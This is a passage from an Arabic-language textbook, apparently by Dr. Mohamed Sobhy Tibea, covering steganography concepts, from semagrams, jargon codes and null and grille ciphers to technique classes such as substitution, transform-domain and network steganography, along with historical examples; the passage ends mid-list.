‫إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻠﻐوي ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﻓﻲ ﻧﺎﻗل )‪(Carrier\vessels‬ﺑﺎﺳﺗﺧدام ﺑﻌض اﻟطرق اﻟﻣﺑﺗﻛرة‪ .‬ﯾﺗم ﺗﺻﻧﯾف ھذه اﻟﺗﻘﻧﯾﺔ‪ ،‬ﻋﻠﻰ‬
‫أﻧﮭﺎ ‪ semagrams‬أو ‪.open codes‬‬
‫‪Semagrams -1‬‬
‫ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب اﻟرﻣوز واﻟﻌﻼﻣﺎت اﻟﻣﺧﺗﻠﻔﺔ ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت أو اﻟرﺳﺎﺋل‪ .‬ﻛذﻟك ﯾﺻﻧف ھذا أﯾﺿﺎ اﻟﻰ ﺳﯾﻣﺎﺟراﻣس اﻟﺑﺻري‬
‫وﺳﯾﻣﺎﺟراﻣس اﻟﻧﺻﻲ‪.‬‬
‫‪ -‬ﺳﯾﻣﺎﺟراﻣس اﻟﺑﺻري )‪(Visual Semagrams‬‬
‫ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب اﻟﻛﺎﺋﻧﺎت اﻟﻣﺎدﯾﺔ اﻟﻐﯾر ﺿﺎره )‪ (unmalicious physical objects‬ﻹرﺳﺎل رﺳﺎﻟﺔ ﻣﺛل رﺳوﻣﺎت اﻟﺷﻌﺎرات أو ﺗﺣدﯾد‬
‫ﻣواﻗﻊ اﻟﻌﻧﺎﺻر اﻟﻣوﺟودة ﻓﻲ اﻟﻣﻛﺗب أو اﻟﻣوﻗﻊ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪.‬‬
‫‪ -‬ﺳﯾﻣﺎﺟراﻣس اﻟﻧﺻﻲ )‪(Text Semagrams‬‬
‫ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب ﻓﻲ إﺧﻔﺎء ﻧص اﻟرﺳﺎﻟﺔ ﻋن طرﯾﻖ ﺗﺣوﯾل أو ﺗﻐﯾﯾر ﻣظﮭر اﻟرﺳﺎﻟﺔ اﻟﻧﺻﯾﺔ اﻟﻧﺎﻗﻠﺔ‪ ،‬ﻣﺛل ﺗﻐﯾﯾر أﺣﺟﺎم اﻟﺧطوط واﻷﻧﻣﺎط‪،‬‬
‫وإﺿﺎﻓﺔ ﻣﺳﺎﻓﺎت إﺿﺎﻓﯾﺔ ﻛﻣﺳﺎﻓﺎت ﺑﯾﺿﺎء ﻓﻲ اﻟوﺛﯾﻘﺔ‪ ،‬واﻻﻧﻔﻌﺎﻻت اﻟﻣﺧﺗﻠﻔﺔ ﻓﻲ اﻟﺧطﺎﺑﺎت أو اﻟﻧص اﻟﻣﻛﺗوب ﺑﺧط اﻟﯾد‪.‬‬
‫‪Open codes -2‬‬
‫‪ Open codes‬ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻓﻲ رﺳﺎﻟﺔ ﺷرﻋﯾﮫ ﺣﺎﻣﻠﺔ )‪ (legitimate carrier message‬واﻟﺗﻲ ﺻﻣﻣت ﺧﺻﯾﺻﺎ ﻓﻲ ﻧﻣط‬
‫اﻟوﺛﯾﻘﺔ‪/‬اﻟﻣﺳﺗﻧد واﻟﺗﻲ ﻻ ﺗﻛون واﺿﺣﮫ ﻟﻠﻘﺎرئ اﻟﻌﺎدي‪ .‬ﺣﺎﻣل اﻟرﺳﺎﻟﺔ أﺣﯾﺎﻧﺎ ﯾطﻠﻖ ﻋﻠﯾﮫ أﺳم اﻻﺗﺻﺎل اﻟﻣﻛﺷوف )‪(overt communication‬‬
‫واﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﯾطﻠﻖ ﻋﻠﯾﮫ اﺳم اﻻﺗﺻﺎل اﻟﺳري )‪ .(covert communication‬ﺗﻘﻧﯾﺔ ‪ Open codes‬ﺗﻧﻘﺳم إﻟﻰ ﻣﺟﻣوﻋﺗﯾن رﺋﯾﺳﯾﺗﯾن‪ :‬وھﻣﺎ‬
‫‪ jargon codes‬و‪ .covered ciphers‬ﻛﻣﺎ ﯾﻧﻘﺳم ‪ covered ciphers‬اﯾﺿﺎ اﻟﻰ ﻧوﻋﯾن‪ null ciphers :‬و‪.grille ciphers‬‬
‫‪jargon codes -‬‬
‫‪ Jargon codes‬ھﻲ ﻋﺑﺎره ﻋن ﻟﻐﺔ ﯾﻔﮭﻣﮭﺎ ﻣﺟﻣوﻋﺔ ﻣن اﻟﻧﺎس وﻟﻛن ﻻ ﯾﻔﮭﻣﮭﺎ اﻻﺧرﯾن‪ .‬ھذه اﻷﻛواد ﺗﺳﺗﺧدم اﻹﺷﺎرات‪ ،‬واﻟﻣﺻطﻠﺣﺎت‪،‬‬
‫واﻷﺣﺎدﯾث اﻟﺗﻲ ﻟﮭﺎ ﻣﻌﻧﻰ ﺧﺎص واﻟﺗﻲ ﺗﻛون ﻣﻔﮭوﻣﮫ ﻟﻣﺟﻣوﻋﺔ ﻣﺣددة ﻣن اﻟﻧﺎس‪ .‬اﻟﻣﺟﻣوﻋﺔ اﻟﻔرﻋﯾﺔ ﻣن ‪ Jargon codes‬ھﻲ رﻣوز ﺟدﯾﻠﺔ‬
‫)‪ ،(cue codes‬ﺣﯾث ﺗﺣول ﺑﻌض اﻟﻌﺑﺎرات اﻟﺗﻲ ﺗم ﺗرﺗﯾﺑﮭﺎ ﻣﺳﺑﻘﺎ ً اﻟﻰ ﻣﻌﺎﻧﻲ‪.‬‬
‫‪covered ciphers -‬‬
‫ﻓﯾﮫ ﺗﻛون اﻟرﺳﺎﻟﺔ ﻣﺧﻔﯾﮫ ﻋﻠﻧﺎ ﻓﻲ اﻟوﺳﯾط اﻟﻧﺎﻗل ﺣﯾث أن أي ﺷﺧص ﯾﻌرف ﺳر ﻛﯾﻔﯾﺔ إﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﯾﻣﻛن اﺳﺗﻌﺎدﺗﮭﺎ‪ .‬وﯾﻧﻘﺳم ھذا اﻟﻧوع اﻟﻰ‬
‫ﻧوﻋﯾن اﺧرﯾن ھﻣﺎ‪ grille ciphers :‬و‪.null ciphers‬‬
‫‪ Grille ciphers‬ھذا اﻟﻧوع ﯾﺳﺗﺧدم اﻟﻘﺎﻟب )‪ (Template‬واﻟذى ﯾﺳﺗﺧدم ﻟﺗﻐطﯾﺔ اﻟرﺳﺎﻟﺔ اﻟﻧﺎﻗﻠﺔ‪ .‬اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﺗظﮭر ﻓﻲ ﻓﺗﺣﺎت اﻟﻘﺎﻟب ھﻲ‬
‫اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ‪.‬‬
‫ً‬
‫‪ Null cipher‬ﯾﺧﻔﻲ اﻟرﺳﺎﻟﺔ ﺑﺎﺳﺗﺧدام ﻣﺟﻣوﻋﺔ ﻣن اﻟﻘواﻋد اﻟﻣرﺗﺑﺔ ﻣﺳﺑﻘﺎ ‪ ،‬ﻣﺛل 'اﻟﻘراءة ﻋﻧد اﻟﻛﻠﻣﺔ اﻟﺧﺎﻣﺳﺔ' أو '' اﻟﻧظر إﻟﻰ اﻟﺣرف اﻟﺛﺎﻟث‬
‫ﻣن ﻛل ﻛﻠﻣﺔ '‪ .‬وﯾﻣﻛن اﺳﺗﺧداﻣﮫ أﯾﺿﺎ ﻓﻲ إﺧﻔﺎء ﻧص ﻣﺷﻔر‪.‬‬

‫ﺗﻘﻧﯾﺎت أﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ‪Steganography Techniques‬‬


‫ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت )‪ (Steganography techniques‬ﺗﺻﻧف إﻟﻰ ﺳت ﻣﺟﻣوﻋﺎت رﺋﯾﺳﯾﮫ اﺳﺗﻧﺎداً إﻟﻰ ﻏطﺎء اﻟﺗﻌدﯾﻼت اﻟﺗﻲ ﯾﺗم‬
‫ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ ﻋﻣﻠﯾﺔ اﻟﺗﺿﻣﯾن‪ .‬وھم ﻛﺎﻻﺗﻰ‪:‬‬
‫ﺗﻘﻨﯿﺎت اﻻﺳﺘﺒﺪال )‪(Substitution Techniques‬‬
‫ﻓﻲ ھذا اﻷﺳﻠوب‪ ،‬ﯾﺣﺎول اﻟﻣﮭﺎﺟم ﺗرﻣﯾز اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ )‪ (Encode Secret Information‬ﻋن طرﯾﻖ اﺳﺗﺑدال اﻟﺑﺗﺎت اﻟﺿﺋﯾﻠﺔ‪/‬اﻟﻣﮭﻣﻠﺔ‬
‫ﻣن اﻟوﺳﯾط اﻟﻧﺎﻗل ﻣﻊ اﻟرﺳﺎﻟﺔ ﺳرﯾﺔ‪ .‬ﻓﺈذا ﻛﺎن اﻟﻣﺗﻠﻘﻲ ﯾﻌرف أﻻﻣﺎﻛن اﻟﺗﻲ ﯾﺗم ﻓﯾﮫ ﺗﺿﻣﯾن اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ‪ ،‬ﻓﺄﻧﮫ ﯾﻣﻛﻧﮫ اﺳﺗﺧراج اﻟرﺳﺎﻟﺔ‬
‫اﻟﺳرﯾﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪459‬‬

‫ﺗﻘﻨﯿﺎت ﺗﺤﻮﯾﻞ اﻟﺪوﻣﯿﻦ )‪(Transform Domain Techniques‬‬


‫‪ Transform Domain Techniques‬ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻓﻲ أﺟزاء ﺧﺎﺻﮫ ﻣن اﻟﺻور )‪) (Cover Image‬اﻟوﺳﯾط اﻟﻧﺎﻗل( وذﻟك‬
‫ﺑﺎﺳﺗﺧدام ﺑﻌض اﻟﺗﻘﻧﯾﺎت ﻣﺛل )‪ The Discrete Cosine Transform (DCT‬وذﻟك ﻣن ﺧﻼل ﻋﻣﻠﯾﺔ اﻟﺗﺣول ﻓﻲ اﻹﺷﺎرات ﻣﺛل‬
‫‪ .frequency domain‬ﻣﺛل ﻣن ﺧﻼل ﻋﻣﻠﯾﺔ ﺿﻐط اﻟﺻور ﻟﻌرﺿﮭﺎ ﻋﻠﻰ اﻟوﯾب‪ ،‬وﺑﻌض ﻣﻧﺎطﻖ اﻟﻌﻣﻠﯾﺎت اﻷﺧرى ﻓﻲ اﻟﺻور‪ .‬وھذا ﯾﺟﻌﻠﮭﺎ‬
‫أﻛﺛر ﺻراﻣﺔ ﺿد اﻟﮭﺟﻣﺎت‪ .‬ﯾﻣﻛن ﺗطﺑﯾﻖ ھذه اﻟﺗﺣوﯾﻼت ﻋﻠﻰ ﻛﺗل ﻣن اﻟﺻور أو ﻋﻠﻰ اﻟﺻورة ﺑﺄﻛﻣﻠﮭﺎ‪.‬‬
‫‪Spread Spectrum Techniques‬‬
‫ھذا اﻷﺳﻠوب ﯾوﻓر اﻟوﺳﯾﻠﺔ ﻟﺗﺿﻌﯾف اﺣﺗﻣﺎل اﻋﺗراض وﻣﻛﺎﻓﺣﺔ اﻟﺗﺷوﯾش ﻋﻠﻰ اﻻﺗﺻﺎﻻت‪ .‬ھذا ھو وﺳﯾﻠﺔ ﻣن وﺳﺎﺋل اﻻﺗﺻﺎل اﻟﺗﻲ ﺗﺳﺗﺧدم‬
‫اﻹﺷﺎرة اﻟزاﺋد ﻣن اﻟﺣد اﻷدﻧﻰ ﻟﻌرض اﻟﻧطﺎق اﻟﺗرددي )‪ (minimum bandwidth‬ﻹرﺳﺎل اﻟﻣﻌﻠوﻣﺎت‪ .‬وﯾﺗم إﻧﺟﺎز اﻧﺗﺷﺎر اﻹﺷﺎرة اﻟزاﺋد‬
‫ﻋن طرﯾﻖ ﻣﺟﻣوﻋﮫ ﻣن اﻷﻛواد )ﻣﺳﺗﻘﻠﺔ ﻣن اﻟﺑﯾﺎﻧﺎت(‪ ،‬وﯾزاﻣن اﻻﺳﺗﻘﺑﺎل ﺑﺎﺳﺗﺧدام اﻷﻛواد اﻟﺗﻲ ﺗﺳﺗﺧدم ﻻﺳﺗرداد اﻟﻣﻌﻠوﻣﺎت ﻣن ﺑﯾﺎﻧﺎت‬
‫‪.Spread Spectrum‬‬
‫اﻟﺘﻘﻨﯿﺎت اﻹﺣﺼﺎﺋﯿﺔ )‪(Statistical Techniques‬‬
‫ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب وﺟود '‪-1‬ﺑت' ﻓﻲ ﻣﺧططﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت)‪ . (steganography schemes‬ﯾﺗﺣﻘﻖ ھذا ﻋن طرﯾﻖ ﺗﻌدﯾل اﻟﻐطﺎء‬
‫ﺑطرﯾﻘﺔ ﻣﺎ ﻋﻧد ﻧﻘل '‪-1‬ﺑت'‪ ،‬ﺑﻌض اﻟﺧﺻﺎﺋص اﻹﺣﺻﺎﺋﯾﺔ ﺗﺗﻐﯾر إﻟﻰ ﺣد ﻛﺑﯾر‪ .‬ﻓﻲ ﺑﻌض اﻟﺣﺎﻻت اﻷﺧرى ﻻ ﯾﺗم ﯾﺗﻐﯾر اﻟﻐطﺎء‪ .‬وﯾﺗم ذﻟك‬
‫ﻟﻠﺗﻣﯾﯾز ﺑﯾن اﻷﻏطﯾﺔ اﻟﻣﻌدﻟﺔ وﻏﯾر اﻟﻣﻌدﻟﺔ‪ .‬ﯾﺳﺗﺧدم ﻟﻼﺳﺗﺧراج اﻟﺑﯾﺎﻧﺎت اﻟﻧظرﯾﺔ اﻟﻔرﺿﯾﺔ )‪ (theory of hypothesis‬ﻣن اﻹﺣﺻﺎء اﻟرﯾﺎﺿﻲ‪.‬‬
‫ﺗﻘﻨﯿﺎت اﻟﺘﺸﻮﯾﮫ )‪(Distortion Techniques‬‬
‫ﻓﻲ ھذا اﻷﺳﻠوب‪ ،‬ﯾﺗم ﺗطﺑﯾﻖ ﺳﻠﺳﻠﺔ ﻣن اﻟﺗﻌدﯾﻼت ﻋﻠﻰ اﻟﻐطﺎء ﺑﻐﯾﺔ اﻟﺣﺻول ﻋﻠﻰ ﻛﺎﺋن ﺳﺗﯾﺟو‪ .‬ﺳﻠﺳﻠﺔ اﻟﺗﻌدﯾﻼت ھذه ﺗﻣﺛل رﺳﺎﻟﺔ ﻣﺣددة ﻟﯾﺗم‬
‫ﻧﻘﻠﮭﺎ‪ .‬ﻋﻣﻠﯾﺔ ﻓك اﻟﺗﺷﻔﯾر ﻓﻲ ھذا اﻷﺳﻠوب ﯾﺗطﻠب اﻟﻣﻌرﻓﺔ ﺣول اﻟﻐطﺎء اﻷﺻﻠﻲ‪ .‬ﻣﺗﻠﻘﻲ اﻟرﺳﺎﻟﺔ ﯾﻣﻛﻧﮫ ﻗﯾﺎس اﻻﺧﺗﻼﻓﺎت ﺑﯾن اﻟﻐﻼف اﻷﺻﻠﻲ‬
‫واﻟﻐﻼف اﻟوارد ﻹﻋﺎدة ﺑﻧﺎء ﺳﻠﺳﻠﺔ اﻟﺗﻌدﯾﻼت )ﻟﺗرﺟﻣﺔ اﻟرﺳﺎﻟﺔ(‪.‬‬
‫‪Cover-generation Techniques‬‬
‫ﻓﻲ ھذه اﻟﺗﻘﻧﯾﺔ‪ ،‬ﯾﺗم ﺗطوﯾر اﻟﻛﺎﺋﻧﺎت اﻟرﻗﻣﯾﺔ ﻟﻐرض ﻛوﻧﮫ ﻏطﺎء ﻟﺳرﯾﺔ اﻻﺗﺻﺎﻻت‪ .‬ﻋﻧدﻣﺎ ﯾﺗم ﺗرﻣﯾز ھذه اﻟﻣﻌﻠوﻣﺎت ﻓﺈﻧﮫ ﯾﺿﻣن ﺧﻠﻖ ﻏطﺎء‬
‫ﻟﻼﺗﺻﺎﻻت اﻟﺳرﯾﺔ‪.‬‬

‫ﯾﻮﺟﺪ ﺗﻘﺴﯿﻢ اﺧﺮ ﻟﺘﻘﻨﯿﺎت إﺧﻔﺎء اﻟﻤﻌﻠﻮﻣﺎت واﻟﺘﻲ ذﻛﺮ ﻣﻦ ﺧﻼل ﻣﻮﻗﻊ وﯾﻜﺒﯿﺪﯾﺎ ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -1‬ﺗﻘﻧﯾﺎت ﻣﺎدﯾﺔ‬
‫اﺳﺗﺧدم إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻋﻠﻰ ﻧطﺎق واﺳﻊ‪ ،‬ﻓﻲ اﻟﻌﺻور اﻟﺗﺎرﯾﺧﯾﺔ اﻟﺣدﯾﺛﺔ وﺣﺗﻰ ﯾوﻣﻧﺎ ھذا‪ .‬وﻣن اﻷﻣﺛﻠﺔ اﻟﻣﻌروﻓﺔ‬
‫اﻟرﺳﺎﺋل ﻣﺧﻔﯾﺔ ﻓﻲ أطﺑﺎق اﻟﺷﻣﻊ "‪"wax tablet‬ﻓﻲ اﻟﻌﺻور اﻟﻘدﯾﻣﺔ‪ ،‬ﻛﺗب اﻟﻧﺎس اﻟرﺳﺎﺋل ﻋﻠﻰ اﻟﺧﺷب ﺛم ﻏطوھﺎ ﺑطﺑﻘﺔ ﻣن اﻟﺷﻣﻊ‪ ،‬ﻛﺗب‬
‫ﻋﻠﯾﮭﺎ رﺳﺎﻟﺔ ﻏﯾر ﻣرﯾﺑﺔ‪.‬‬
‫رﺳﺎﺋل ﺧﻔﯾﺔ ﻋﻠﻰ ﺟﺳم اﻟرﺳول ‪-‬اﺳﺗﺧدﻣت أﯾﺿﺎ ﻓﻲ اﻟﯾوﻧﺎن اﻟﻘدﯾﻣﺔ‪ .‬ھﯾرودوت ﯾﺣﻛﻲ ﻗﺻﺔ رﺳﺎﻟﺔ وﺷم ﻋﻠﻰ رأس رﺟل ﺣﻠﯾﻖ ﻣن ﻋﺑﯾد‬
‫ھﯾﺳﺗﺎ ﯾوس"‪ ، "Histiaeus‬ﻏطﺎھﺎ اﻟﺷﻌر اﻟذي ﻧﻣﺎ ﻓوﻗﮭﺎ ﺑﻌد ذﻟك‪ ،‬وﻛﺷﻔت ﻋﻧد ﺣﻠﻖ اﻟرأس ﻣرة أﺧرى‪ .‬اﻟرﺳﺎﻟﺔ ﺗﺗﺿﻣن ﺗﺣذﯾرا إﻟﻰ‬
‫اﻟﯾوﻧﺎﻧﯾﯾن ﻋن ﺧطط اﻟﻐزو اﻟﻔﺎرﺳﻲ‪ .‬ھذا اﻷﺳﻠوب ﻟﮫ ﻋﯾوب واﺿﺣﺔ‪ ،‬ﻣﺛل ﺗﺄﺧر اﻟﻧﻘل أﺛﻧﺎء اﻧﺗظﺎر ﻧﻣو ﺷﻌر اﻟﻌﺑد‪ ،‬واﻟﻘﯾود اﻟﻣﻔروﺿﺔ ﻋﻠﻰ‬
‫ﻋدد وﺣﺟم اﻟرﺳﺎﺋل اﻟﺗﻲ ﯾﻣﻛن ﺗﺷﻔﯾرھﺎ ﻋﻠﻰ ﻓروة اﻟرأس ﻟﺷﺧص واﺣد‪.‬‬
‫ﻓﻲ اﻷﯾﺎم اﻷوﻟﻰ ﻟﻠﻣطﺎﺑﻊ‪ ،‬ﻛﺎن ﻣن اﻟﺷﺎﺋﻊ ﻣزج اﻟﻣﺣﺎرف )‪ (typefaces‬اﻟﻣﺧﺗﻠﻔﺔ ﻋﻠﻰ اﻟﺻﻔﺣﺔ اﻟﻣطﺑوﻋﺔ اﻟواﺣدة‪ .‬وﯾرﺟﻊ ذﻟك إﻟﻰ ﻋدم‬
‫وﺟود ﻧﺳﺦ ﻛﺎﻓﯾﺔ ﻣن ﺑﻌض اﻟﺣروف ﻟﻠطﺎﺑﻌﺔ‪ .‬وﻟذﻟك‪ ،‬ﯾﻣﻛن أن ﺗﻛﺗب رﺳﺎﻟﺔ ﻣﺧﻔﯾﺔ ﺑﺎﺳﺗﺧدام اﺛﻧﯾن )أو أﻛﺛر( ﻣن اﻟﻣﺣﺎرف اﻟﻣﺧﺗﻠﻔﺔ‪ ،‬ﻣﺛل‬
‫ﻣﺣرف ﻣن اﻟﻧوع اﻟﻌﺎدي أو اﻟﻣﺎﺋل‪.‬‬
‫ﺧﻼل اﻟﺣرب اﻟﻌﺎﻟﻣﯾﺔ اﻟﺛﺎﻧﯾﺔ أرﺳﻠت اﻟﻣﻘﺎوﻣﺔ اﻟﻔرﻧﺳﯾﺔ ﺑﻌض اﻟرﺳﺎﺋل اﻟﻣﻛﺗوﺑﺔ ﻋﻠﻰ ظﮭر ﺳﻌﺎة ﺑﺎﺳﺗﺧدام ﺣﺑر ﺧﻔﻲ‪ .‬رﺳﺎﺋل ﻣﺧﻔﯾﺔ ﻓﻲ ورﻗﺔ‬
‫ﻣﻛﺗوﺑﺔ ﺑﺎﺳﺗﺧدام ﺣﺑر ﺧﻔﻲ‪ ،‬ﺗﺣت رﺳﺎﺋل أﺧرى أو ﻋﻠﻰ أﺟزاء ﻓﺎرﻏﺔ ﻣن اﻟرﺳﺎﺋل اﻷﺧرى‪ .‬رﺳﺎﺋل ﻣﻛﺗوﺑﺔ ﺑﺷﻔرة ﻣورس ﺑﺣﯾﺎﻛﺔ ﻏزل ﺛم‬
‫ﺧﯾطت‪ ،‬اﻟﻘطﻌﺔ اﻟﻣﺣﺎﻛﺔ‪ ،‬ﻓﻲ ﻗطﻌﺔ ﻣن اﻟﻣﻼﺑس اﻟﺗﻲ ﯾرﺗدﯾﮭﺎ اﻟﺳﺎﻋﻲ‪.‬‬
‫‪ -2‬ﺗﻘﻧﯾﺎت رﻗﻣﯾﺔ‬
‫دﺧﻠت ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺣدﯾﺛﺔ ﻓﻲ ﺳﻧﺔ ‪ 1985‬ﻣﻊ ظﮭور اﻟﺣواﺳﯾب اﻟﺷﺧﺻﯾﺔ‪ ،‬وﺟرى ﺗطﺑﯾﻖ ﻣﺷﺎﻛل إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻘﻠﯾدﯾﺔ‬
‫ﻋﻠﯾﮭﺎ‪ .‬إن اﻟﺗطور اﻟذي أﻋﻘب ذﻟك ﻛﺎن ﺑطﯾﺋﺎ‪ ،‬وﻟﻛن ﻣﻧذ اﻧطﻼﻗﮭﺎ‪ ،‬ﺗﻌﺎظم ﺣﺟم ﺑرﻣﺟﯾﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﻣﺗﺎﺣﺔ‪.‬‬
‫إﺧﻔﺎء اﻟرﺳﺎﺋل ﺑﺗﺿﻣﯾﻧﮭﺎ ﻓﻲ اﻟﺑﺗﺎت اﻷﻗل أھﻣﯾﺔ ﻟﻠﺻور اﻟﻣﺷوﺷﺔ أو ﻣﻠﻔﺎت اﻟﺻوت‪.‬‬
‫إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﺿﻣن ﺑﯾﺎﻧﺎت ﻣﺷﻔرة أو ﺿﻣن ﺑﯾﺎﻧﺎت ﻋﺷواﺋﯾﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪460‬‬

‫ﺗﺷﻔر اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾراد اﺧﻔﺎؤھﺎ‪ ،‬ﻗﺑل اﺳﺗﺧداﻣﮭﺎ ﻟﻠﻛﺗﺎﺑﺔ ﻓوق ﺟزء ﻣن ﻛﺗﻠﺔ أﻛﺑر ﺑﻛﺛﯾر ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﻣﺷﻔرة أو ﻛﺗﻠﺔ ﻣن اﻟﺑﯾﺎﻧﺎت‬
‫اﻟﻌﺷواﺋﯾﺔ( اﻟﺷﻔرات اﻟﻐﯾر ﻗﺎﺑﻠﺔ ﻟﻠﻛﺳر ﻣﺛل ﻟوﺣﺔ اﻟﻣرة اﻟواﺣدة ‪ One-time pad‬ﺗوﻟد ﻧﺻوص ﻣﺷﻔرة‪ ،‬ﺗﺑدو ﻋﺷواﺋﯾﺔ ﺗﻣﺎﻣﺎ إذا ﻛﺎن اﻟﻣﮭﺎﺟم‬
‫ﻻ ﯾﻣﻠك اﻟﻣﻔﺗﺎح اﻟﺧﺎص)"‪. ("private key‬‬
‫اﻹﺧﻔﺎء ﺑﺗﻌدﯾل اﻟﺻدى ﻓﻲ ﻣﻠف اﻟﺻوت‪.‬‬
‫اﻹﺧﻔﺎء اﻵﻣن ﻓﻲ اﻹﺷﺎرات اﻟﺻوﺗﯾﺔ‪.‬‬
‫اﻹﺧﻔﺎء ﺑﺗﻌدﯾل اﻟﺻدى ﻓﻲ ﻣﻠف اﻟﺻوت‪.‬‬
‫ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت ﻓﻲ أﻗﺳﺎم ﻣﮭﻣﻠﺔ ﻣن اﻟﻣﻠف‪ ،‬ﻣﺛل ﺑﻌد ﻧﮭﺎﯾﺔ ﺳطر ﻣرﺋﻲ ﻟﻣﻠف اﻟﻧﺎﻗل‪.‬‬
‫ﺟﻌل اﻟﻧص ﺑﻧﻔس ﻟون اﻟﺧﻠﻔﯾﺔ ﻓﻲ وﺛﺎﺋﻖ ﻣﻌﺎﻟﺞ اﻟﻛﻠﻣﺎت‪ ،‬ورﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬واﻟﻣﺷﺎرﻛﺎت ﻓﻲ اﻟﻣﻧﺗدى‪.‬‬
‫‪ -3‬ﺗﻘﻧﯾﺎت ﺷﺑﻛﯾﺔ‬
‫ﺟﻣﯾﻊ ﺗﻘﻧﯾﺎت ﺗﺑﺎدل ﻣﻘﺎطﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ "‪ "steganogram‬اﻟﺗﻲ ﯾﻣﻛن ﺗﺑﺎدﻟﮭﺎ ﻓﻲ ﺷﺑﻛﺎت اﻻﺗﺻﺎل اﻟﺳﻠﻛﻲ واﻟﻼﺳﻠﻛﻲ‪ ،‬ﺗﺳﻣﻰ ﺑﺎﻹﺧﻔﺎء‬
‫اﻟﺷﺑﻛﻲ”‪ . "network steganography‬اول اﺳﺗﺧدام ﻟﮭذه اﻟﺗﺳﻣﯾﺔ ﻛﺎن ﻣن ﻗﺑل "ﻛرﯾﺳﺗوف ﺷﯾﺑﯾورﺳﻛﻲ ﺳﻧﺔ ‪ .2003‬ﺑﺎﻟﺗﻘﺎﺑل ﻣﻊ اﻷﺳﺎﻟﯾب‬
‫اﻟﺗﻘﻠﯾدﯾﺔ اﻟﺗﻲ ﺗﺳﺗﺧدم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟوﺳﺎﺋط اﻟرﻗﻣﯾﺔ )ﻣﻠﻔﺎت اﻟﺻور واﻟﺻوت واﻟﻔﯾدﯾو( ﻛﻐطﺎء ﻟﻠﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ‪ ،‬ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺷﺑﻛﺔ‬
‫ﯾﺳﺗﺧدم ﻋﻧﺎﺻر اﻟﺗﺣﻛم ﻟﺑروﺗوﻛوﻻت اﻻﺗﺻﺎﻻت واﻟوظﺎﺋف اﻟﺟوھرﯾﺔ اﻷﺳﺎﺳﯾﺔ‪ .‬وﻧﺗﯾﺟﺔ ﻟذﻟك‪ ،‬ھذه اﻷﺳﺎﻟﯾب ھﻲ أﺻﻌب ﻓﻲ اﻟﻛﺷف ﻋﻧﮭﺎ‬
‫واﻟﻘﺿﺎء ﻋﻠﯾﮭﺎ‪ .‬ﺗﻧطوي أﺳﺎﻟﯾب ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺷﺑﻛﺔ اﻟﻧﻣوذﺟﯾﺔ ﻋﻠﻰ ﺗﻌدﯾل ﺧﺻﺎﺋص ﺑروﺗوﻛول ﺷﺑﻛﺔ اﺗﺻﺎل واﺣد‪ .‬وﯾﻣﻛن ﺗطﺑﯾﻖ ھذا‬
‫اﻟﺗﻌدﯾل إﻟﻰ)‪) PDU (Protocol Data Unit‬وﺣدة ﺑﯾﺎﻧﺎت اﻟﺑروﺗوﻛول(‪ .‬ﻋﻼوة ﻋﻠﻰ ذﻟك‪ ،‬ﻓﻣن اﻟﻣﻣﻛن اﻻﺳﺗﻔﺎدة ﻣن اﻟﻌﻼﻗﺔ ﺑﯾن اﺛﻧﯾن أو‬
‫أﻛﺛر ﻣن ﺑروﺗوﻛوﻻت اﻟﺷﺑﻛﺔ اﻟﻣﺧﺗﻠﻔﺔ ﻟﺗﻣﻛﯾن اﻻﺗﺻﺎﻻت اﻟﺳرﯾﺔ‪ .‬ﺗﻘﻊ ھذه اﻟﺗطﺑﯾﻘﺎت ﺗﺣت ﻣﺻطﻠﺢ)‪.(inter-protocol steganography‬‬
‫ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺷﺑﻛﺔ ﯾﻐطﻲ طﺎﺋﻔﺔ واﺳﻌﺔ ﻣن اﻟﺗﻘﻧﯾﺎت‪ ،‬واﻟﺗﻲ ﺗﺷﻣل‪:‬‬
